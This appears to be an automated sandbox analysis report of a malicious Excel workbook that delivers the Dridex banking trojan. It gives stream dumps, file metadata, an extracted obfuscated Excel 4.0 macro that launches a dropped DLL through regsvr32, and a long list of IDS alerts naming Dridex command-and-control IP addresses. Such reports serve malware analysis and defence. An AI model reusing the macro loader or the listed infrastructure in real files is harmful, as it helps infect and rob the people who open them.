                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 68 00 e1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 842
                                                                                General
                                                                                Stream Path:VBA/dir
                                                                                File Type:data
                                                                                Stream Size:842
                                                                                Entropy:6.51749232573
                                                                                Base64 Encoded:True
                                                                                Data ASCII:. F . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . I . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                Data Raw:01 46 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 ab 49 f7 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                Macro 4.0 Code

                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",zdkvrlsh.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                OLE File "/opt/package/joesandbox/database/analysis/342170/sample/printouts of outstanding as of 01_20_2021.xlsm"

                                                                                Indicators

                                                                                Has Summary Info:False
                                                                                Application Name:unknown
                                                                                Encrypted Document:False
                                                                                Contains Word Document Stream:
                                                                                Contains Workbook/Book Stream:
                                                                                Contains PowerPoint Document Stream:
                                                                                Contains Visio Document Stream:
                                                                                Contains ObjectPool Stream:
                                                                                Flash Objects Count:
                                                                                Contains VBA Macros:False

                                                                                Summary

                                                                                Author:msc.com
                                                                                Last Saved By:
                                                                                Create Time:2021-01-20T10:44:11Z
                                                                                Last Saved Time:2021-01-20T11:03:27Z
                                                                                Security:0

                                                                                Document Summary

                                                                                Thumbnail Scaling Desired:false
                                                                                Company:
                                                                                Contains Dirty Links:false
                                                                                Shared Document:false
                                                                                Changed Hyperlinks:false
                                                                                Application Version:16.0300

                                                                                Streams

                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 112
                                                                                General
                                                                                Stream Path:\x1CompObj
                                                                                File Type:data
                                                                                Stream Size:112
                                                                                Entropy:4.6011544911
                                                                                Base64 Encoded:False
                                                                                Data ASCII:. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Stream Path: f, File Type: data, Stream Size: 88
                                                                                General
                                                                                Stream Path:f
                                                                                File Type:data
                                                                                Stream Size:88
                                                                                Entropy:3.36756968706
                                                                                Base64 Encoded:False
                                                                                Data ASCII:. . ( . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . 1 . . . . R . . . . . . . . . . . K . Q . . . . . . . . . . . C a l i b r i . . . . . . . . . .
                                                                                Data Raw:00 04 28 00 00 0c 1a 08 03 00 00 00 01 00 00 80 ff ff 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 31 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 00 00 00 90 01 ac b6 01 00 07 43 61 6c 69 62 72 69 00 00 00 00 00 00 00 00 00 00
                                                                                Stream Path: o, File Type: empty, Stream Size: 0
                                                                                General
                                                                                Stream Path:o
                                                                                File Type:empty
                                                                                Stream Size:0
                                                                                Entropy:0.0
                                                                                Base64 Encoded:False
                                                                                Data ASCII:
                                                                                Data Raw:

                                                                                Macro 4.0 Code

                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",zdkvrlsh.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                01/20/21-16:14:23.457039TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349171194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:26.228542TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349170194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:26.724710TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349173211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:28.282261TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349174211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:30.182666TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649177198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:30.182666TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649177198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:31.550004TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349179194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:31.731283TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649180198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:31.731283TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649180198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:34.093419TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349182211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:34.591667TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349183194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:37.979532TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349184211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:39.169614TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349186194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:39.331030TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349187194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:40.124535TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649188198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:40.124535TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649188198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:41.648935TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649190198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:41.648935TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649190198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:43.089104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349191194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:43.135685TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349192194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:44.623232TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349193211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:46.221546TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349194211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:48.244805TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349196211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:48.695032TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649197198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:48.695032TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649197198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:50.108299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349199194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:51.591157TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349200211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:52.370780TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649202198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:52.370780TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649202198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:53.285784TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349203211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:53.840102TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349204194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:55.660527TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349207211.110.44.63192.168.2.22
                                                                                01/20/21-16:14:55.704819TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649208198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:55.704819TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649208198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:58.035561TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349209194.225.58.214192.168.2.22
                                                                                01/20/21-16:14:58.469703TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649206198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:58.469703TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649206198.57.200.100192.168.2.22
                                                                                01/20/21-16:14:59.441899TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349210211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:00.493616TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349212194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:01.014419TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649213198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:01.014419TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649213198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:01.890392TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349215211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:02.345410TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349216194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:02.713631TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649218198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:02.713631TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649218198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:03.726148TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349219211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:03.807705TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649220198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:03.807705TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649220198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:04.048556TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349222194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:05.136898TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349225194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:05.208000TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649223198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:05.208000TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649223198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:05.411890TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349224211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:06.506089TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349227211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:06.546210TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349228194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:07.035975TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649229198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:07.035975TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649229198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:07.924734TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349231211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:08.364631TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349232194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:08.721209TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649234198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:08.721209TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649234198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:09.754298TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349235211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:09.835498TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649236198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:09.835498TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649236198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:10.071746TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349238194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:11.177829TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349241194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:11.234838TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649239198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:11.234838TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649239198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:11.449779TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349240211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:12.563508TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349243211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:12.580828TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349244194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:13.077678TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649245198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:13.077678TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649245198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:13.287824TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349246194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:13.966141TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349248211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:14.437696TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349249194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:14.774062TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649251198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:14.774062TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649251198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:15.421195TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349252211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:15.846537TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349253211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:15.886850TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649254198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:15.886850TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649254198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:16.121128TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349256194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:16.988439TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349257194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:17.216505TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349260194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:17.288403TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649258198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:17.288403TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649258198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:17.497066TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349259211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:18.619197TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349264194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:18.697856TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349263211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:18.899015TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649265198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:18.899015TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649265198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:19.175457TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649267198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:19.175457TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649267198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:19.189338TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349266211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:19.998560TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349269211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:20.243889TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349270194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:20.521086TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349271194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:20.811847TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649273198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:20.811847TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649273198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:21.615675TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349275211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:21.901953TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349276211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:22.031024TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:22.031024TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:22.161134TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349279194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:22.649079TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649280198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:22.649079TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649280198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:23.310390TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649281198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:23.310390TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649281198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:23.363164TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349283194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:23.554688TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349282211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:24.661546TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349288194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:24.731142TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349287211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:24.995269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:24.995269TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:25.219839TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649290198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:25.219839TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649290198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:26.040767TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349292211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:26.340132TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349293194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:26.577427TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349294194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:26.866345TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649296198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:26.866345TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649296198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:26.991143TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349286194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:27.748577TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349297211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:27.961734TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349298211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:28.030053TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649299198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:28.030053TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649299198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:28.241166TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349302194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:28.428231TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349301211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:29.621223TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:29.621223TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:29.707779TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349304211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:29.940860TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349305194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:30.660328TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349309194.225.58.214192.168.2.22
                                                                                01/20/21-16:15:31.637966TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349310211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:31.983140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:31.983140TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.001463TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649314198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.001463TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649314198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.040879TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349311211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:32.077993TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
